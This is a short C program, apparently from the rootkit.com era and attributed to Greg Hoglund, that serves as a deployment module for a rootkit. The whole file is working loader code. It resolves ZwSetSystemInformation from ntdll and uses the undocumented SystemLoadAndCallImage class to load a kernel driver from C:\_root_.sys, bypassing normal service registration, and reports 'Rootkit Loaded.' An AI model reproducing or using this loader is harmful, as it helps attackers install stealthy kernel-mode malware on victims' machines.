用ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动

////////////////////////////////////////
// New Deployment Module for rootkit 040
// -------------------------------------
// -Greg Hoglund http://www.rootkit.com ////////////////////////////////////////
#include <windows.h>
#include <stdio.h>

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
PWSTR  Buffer;
#endif // MIDL_PASS

} UNICODE_STRING, *PUNICODE_STRING;

typedef unsigned long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

NTSTATUS (__stdcall *ZwSetSystemInformation)(
IN DWORD SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength
);

VOID (__stdcall *RtlInitUnicodeString)(
IN OUT PUNICODE_STRING  DestinationString,
IN PCWSTR  SourceString
);

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;

} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

#define SystemLoadAndCallImage 38

void main(void)
{
///////////////////////////////////////////////////////////////
// Why mess with Drivers?
///////////////////////////////////////////////////////////////
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"\\??\\C:\\_root_.sys";

//////////////////////////////////////////////////////////////
// get DLL entry points
//////////////////////////////////////////////////////////////
if( !(RtlInitUnicodeString =
(void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"RtlInitUnicodeString" )) )
exit(1);

if( !(ZwSetSystemInformation =
(void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwSetSystemInformation" )) )
exit(1);

RtlInitUnicodeString(  &(GregsImage.ModuleName),
daPath );

if NT_SUCCESS(
ZwSetSystemInformation(  SystemLoadAndCallImage,
&GregsImage,
sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) )
{
printf("Rootkit Loaded.\n");
}
else
{
printf("Rootkit not loaded.\n");
}

}